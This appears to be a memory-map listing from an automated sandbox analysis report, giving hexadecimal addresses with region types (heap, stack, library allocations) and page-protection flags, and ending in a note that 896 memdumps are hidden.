trusted library allocation
page read and write
620000
trusted library allocation
page read and write
1C7EE000
stack
page read and write
2B04000
trusted library allocation
page read and write
1D7000
trusted library allocation
page execute and read and write
B71000
unkown
page execute read
1AB3F000
heap
page read and write
2B2F000
trusted library allocation
page read and write
700000
trusted library allocation
page read and write
2871000
trusted library allocation
page read and write
1B1CC000
stack
page read and write
4A0000
trusted library allocation
page read and write
2D89000
trusted library allocation
page read and write
29D1000
trusted library allocation
page read and write
3FBE000
trusted library allocation
page read and write
2CE7000
trusted library allocation
page read and write
1AB43000
heap
page read and write
2DBD000
trusted library allocation
page read and write
2970000
trusted library allocation
page read and write
24C000
stack
page read and write
4A20000
trusted library section
page read and write
2BBC000
trusted library allocation
page read and write
C3E000
stack
page read and write | page guard
670000
trusted library allocation
page read and write
1412000
unkown
page readonly
1A3C0000
heap
page read and write
2C68000
trusted library allocation
page read and write
2DBF000
trusted library allocation
page read and write
2B99000
trusted library allocation
page read and write
280B000
trusted library allocation
page read and write
2491000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
29E9000
trusted library allocation
page read and write
5F0000
trusted library allocation
page read and write
2787000
trusted library allocation
page read and write
1AAC8000
heap
page read and write
2888000
trusted library allocation
page read and write
2BD9000
trusted library allocation
page read and write
38A000
heap
page read and write
49E000
heap
page read and write
690000
trusted library allocation
page execute and read and write
2A7B000
trusted library allocation
page read and write
2BB8000
trusted library allocation
page read and write
275D000
trusted library allocation
page read and write
27BB000
trusted library allocation
page read and write
29AC000
trusted library allocation
page read and write
400000
heap
page read and write
2785000
trusted library allocation
page read and write
29A1000
trusted library allocation
page read and write
38D000
heap
page read and write
37A0000
trusted library allocation
page read and write
6A0000
trusted library allocation
page read and write
7FE8B9C0000
trusted library allocation
page read and write
3670000
trusted library allocation
page read and write
3F77000
trusted library allocation
page read and write
29A7000
trusted library allocation
page read and write
28A9000
trusted library allocation
page read and write
174A3000
trusted library allocation
page read and write
4184000
trusted library allocation
page read and write
28DB000
trusted library allocation
page read and write
2BDB000
trusted library allocation
page read and write
29AE000
trusted library allocation
page read and write
4D0E000
stack
page read and write
2B5F000
trusted library allocation
page read and write
2C0B000
trusted library allocation
page read and write
2D6000
stack
page read and write
2849000
trusted library allocation
page read and write
1A70F000
stack
page read and write
2C0000
trusted library allocation
page read and write
265C000
trusted library allocation
page read and write
1A758000
heap
page execute and read and write
2CB3000
trusted library allocation
page read and write
4AA000
heap
page read and write
2A73000
trusted library allocation
page read and write
4EE000
stack
page read and write
204000
heap
page read and write
2890000
trusted library allocation
page read and write
2A18000
trusted library allocation
page read and write
2757000
trusted library allocation
page read and write
365A000
trusted library allocation
page read and write
275B000
trusted library allocation
page read and write
3F5B000
trusted library allocation
page read and write
2FC000
heap
page read and write
2ADE000
trusted library allocation
page read and write
1B10F000
stack
page read and write
3950000
heap
page read and write
2D0B000
trusted library allocation
page read and write
430000
trusted library allocation
page read and write
4F0000
trusted library allocation
page read and write
2A94000
trusted library allocation
page read and write
2AF5000
trusted library allocation
page read and write
29F9000
trusted library allocation
page read and write
4C4000
heap
page read and write
2C5C000
trusted library allocation
page read and write
2790000
trusted library allocation
page read and write
2A0A000
trusted library allocation
page read and write
1EB000
trusted library allocation
page execute and read and write
2ABD000
trusted library allocation
page read and write
2875000
trusted library allocation
page read and write
298B000
trusted library allocation
page read and write
298000
heap
page read and write
7FE8B74D000
trusted library allocation
page execute and read and write
49EF000
stack
page read and write
7FE8B750000
trusted library allocation
page read and write
1C59F000
stack
page read and write
2900000
trusted library allocation
page read and write
1D2000
trusted library allocation
page read and write
262C000
trusted library allocation
page read and write
28FE000
trusted library allocation
page read and write
2B97000
trusted library allocation
page read and write
2873000
trusted library allocation
page read and write
295B000
trusted library allocation
page read and write
2DFD000
trusted library allocation
page read and write
134000
trusted library allocation
page read and write
292B000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
2DB7000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
2DF3000
trusted library allocation
page read and write
27B7000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
2BF2000
trusted library allocation
page read and write
2BF8000
trusted library allocation
page read and write
2816000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
2DDA000
trusted library allocation
page read and write
2D8B000
trusted library allocation
page read and write
226F000
stack
page read and write
2A5A000
trusted library allocation
page read and write
7FE8BA30000
trusted library allocation
page read and write
27B5000
trusted library allocation
page read and write
2766000
trusted library allocation
page read and write
2921000
trusted library allocation
page read and write
45DE000
stack
page read and write
2BD7000
trusted library allocation
page read and write
1F0000
heap
page read and write
2CB1000
trusted library allocation
page read and write
28E9000
trusted library allocation
page read and write
481000
heap
page read and write
2993000
trusted library allocation
page read and write
29FB000
trusted library allocation
page read and write
2853000
trusted library allocation
page read and write
2D74000
trusted library allocation
page read and write
200000
heap
page read and write
280000
heap
page execute and read and write
123F1000
trusted library allocation
page read and write
E40000
trusted library section
page read and write
2B54000
trusted library allocation
page read and write
2D1F000
trusted library allocation
page read and write
27CC000
trusted library allocation
page read and write
6EE000
stack
page read and write
3553000
trusted library allocation
page read and write
350D000
trusted library allocation
page read and write
407000
heap
page read and write
2AC1000
trusted library allocation
page read and write
1B36B000
stack
page read and write
1D38000
stack
page read and write
29E8000
trusted library allocation
page read and write
3FA4000
trusted library allocation
page read and write
29A3000
trusted library allocation
page read and write
29FD000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
2A07000
trusted library allocation
page read and write
286F000
trusted library allocation
page read and write
31A000
heap
page read and write
28D8000
trusted library allocation
page read and write
4D4000
heap
page read and write
2D4D000
trusted library allocation
page read and write
2AB9000
trusted library allocation
page read and write
2DA2000
trusted library allocation
page read and write
2812000
trusted library allocation
page read and write
53E000
heap
page read and write
29AA000
trusted library allocation
page read and write
2A22000
trusted library allocation
page read and write
2B3B000
trusted library allocation
page read and write
2A35000
trusted library allocation
page read and write
2DD6000
trusted library allocation
page read and write
2743000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
2AD2000
trusted library allocation
page read and write
2833000
trusted library allocation
page read and write
1C211000
heap
page read and write
2A48000
trusted library allocation
page read and write
2C8C000
trusted library allocation
page read and write
266B000
trusted library allocation
page read and write
1CA2C000
stack
page read and write
2C0F000
trusted library allocation
page read and write
7FE8BA20000
trusted library allocation
page read and write
2923000
trusted library allocation
page read and write
29E4000
trusted library allocation
page read and write
8F5000
trusted library allocation
page read and write
28B2000
trusted library allocation
page read and write
2B29000
trusted library allocation
page read and write
29C2000
trusted library allocation
page read and write
1A5C0000
heap
page read and write
20000
heap
page read and write
1DB0000
heap
page read and write
395B000
trusted library allocation
page read and write
7FE8B9F0000
trusted library allocation
page read and write
2F0000
trusted library allocation
page execute and read and write
390000
heap
page read and write
7FE8B930000
trusted library allocation
page execute and read and write
29FD000
trusted library allocation
page read and write
6FD000
stack
page read and write
29C4000
trusted library allocation
page read and write
23C0000
heap
page read and write
1B65F000
stack
page read and write
37A0000
trusted library allocation
page read and write
1AF2E000
stack
page read and write
1310000
unkown
page readonly
2886000
trusted library allocation
page read and write
2B22000
trusted library allocation
page read and write
4A70000
trusted library allocation
page execute and read and write
7FE8BA35000
trusted library allocation
page read and write
4E7E000
stack
page read and write
2857000
trusted library allocation
page read and write
2C7F000
trusted library allocation
page read and write
418000
stack
page read and write
2C49000
trusted library allocation
page read and write
1D2000
trusted library allocation
page read and write
3F74000
trusted library allocation
page read and write
2BC1000
trusted library allocation
page read and write
2660000
trusted library allocation
page read and write
7FE8B948000
trusted library allocation
page read and write
10000
heap
page read and write
240000
trusted library allocation
page read and write
1AA70000
heap
page read and write
1C18C000
heap
page read and write
4F0000
heap
page read and write
2806000
trusted library allocation
page read and write
27E7000
trusted library allocation
page read and write
2B52000
trusted library allocation
page read and write
23F6000
heap
page read and write
2D8D000
trusted library allocation
page read and write
28A5000
trusted library allocation
page read and write
27B3000
trusted library allocation
page read and write
1D6000
trusted library allocation
page execute and read and write
2C11000
trusted library allocation
page read and write
17CAE000
stack
page read and write
2B33000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
540000
heap
page read and write
29D3000
trusted library allocation
page read and write
2C3F000
trusted library allocation
page read and write
1A750000
heap
page execute and read and write
2A31000
trusted library allocation
page read and write
28F000
trusted library allocation
page read and write
2B35000
trusted library allocation
page read and write
2340000
heap
page execute and read and write
2C43000
trusted library allocation
page read and write
2AC4000
trusted library allocation
page read and write
2A33000
trusted library allocation
page read and write
D20000
trusted library allocation
page execute and read and write
480000
heap
page read and write
37A0000
trusted library allocation
page read and write
7FE8B900000
trusted library allocation
page execute and read and write
2AD0000
trusted library allocation
page read and write
1C8EE000
stack
page read and write
29D7000
trusted library allocation
page read and write
2927000
trusted library allocation
page read and write
1AA74000
heap
page read and write
7FE8B743000
trusted library allocation
page execute and read and write
1E2000
trusted library allocation
page read and write
900000
heap
page read and write
2B06000
trusted library allocation
page read and write
2ABF000
trusted library allocation
page read and write
25DF000
trusted library allocation
page read and write
14D000
trusted library allocation
page execute and read and write
2976000
trusted library allocation
page read and write
2BF6000
trusted library allocation
page read and write
29C3000
trusted library allocation
page read and write
7FE8B944000
trusted library allocation
page read and write
2D08000
trusted library allocation
page read and write
2D6E000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
7FE8BA70000
trusted library allocation
page read and write
1C227000
heap
page read and write
28E7000
trusted library allocation
page read and write
4C2000
heap
page read and write
2BA9000
trusted library allocation
page read and write
7FE8B8FC000
trusted library allocation
page read and write
1C17E000
stack
page read and write
2C6A000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
2BDF000
trusted library allocation
page read and write
486000
heap
page read and write
2B31000
trusted library allocation
page read and write
7FE8B800000
trusted library allocation
page execute and read and write
2A27000
trusted library allocation
page read and write
3F4B000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
2CC8000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
2D19000
trusted library allocation
page read and write
BCE000
stack
page read and write | page guard
2D23000
trusted library allocation
page read and write
2601000
trusted library allocation
page read and write
2929000
trusted library allocation
page read and write
29E6000
trusted library allocation
page read and write
1A5C5000
heap
page read and write
140000
trusted library allocation
page read and write
2C79000
trusted library allocation
page read and write
280C000
trusted library allocation
page read and write
1C98D000
stack
page read and write
4AA000
heap
page read and write
2CEC000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
2CCE000
trusted library allocation
page read and write
123C1000
trusted library allocation
page read and write
2DF1000
trusted library allocation
page read and write
1DB000
trusted library allocation
page execute and read and write
27AF000
trusted library allocation
page read and write
2A1C000
trusted library allocation
page read and write
389D000
trusted library allocation
page read and write
25CB000
trusted library allocation
page read and write
2CAF000
trusted library allocation
page read and write
29FF000
trusted library allocation
page read and write
123CF000
trusted library allocation
page read and write
2D4F000
trusted library allocation
page read and write
3866000
trusted library allocation
page read and write
1C25C000
heap
page read and write
1312000
unkown
page execute read
1310000
unkown
page readonly
4C4000
heap
page read and write
29E0000
trusted library allocation
page read and write
2CB7000
trusted library allocation
page read and write
120000
trusted library allocation
page read and write
265E000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
1C22A000
heap
page read and write
1DD000
heap
page read and write
2A60000
trusted library allocation
page read and write
288E000
trusted library allocation
page read and write
1C490000
heap
page read and write
2120000
trusted library allocation
page execute and read and write
22AA000
heap
page read and write
1B500000
heap
page read and write
10000
heap
page read and write
222F000
stack
page read and write
2A54000
trusted library allocation
page read and write
7FE8B990000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
3954000
heap
page read and write
379F000
stack
page read and write
300000
trusted library allocation
page read and write
7FE8B910000
trusted library allocation
page execute and read and write
4C2000
heap
page read and write
27D7000
trusted library allocation
page read and write
28BC000
trusted library allocation
page read and write
10000
heap
page read and write
293A000
trusted library allocation
page read and write
610000
trusted library allocation
page execute and read and write
4C3E000
stack
page read and write
2ADC000
trusted library allocation
page read and write
2AED000
trusted library allocation
page read and write
2C47000
trusted library allocation
page read and write
2BE1000
trusted library allocation
page read and write
2D55000
trusted library allocation
page read and write
28BA000
trusted library allocation
page read and write
2DAA000
trusted library allocation
page read and write
2D3A000
trusted library allocation
page read and write
4C4000
heap
page read and write
2762000
trusted library allocation
page read and write
7FE8B950000
trusted library allocation
page read and write
There are 896 hidden memdumps, click here to show them.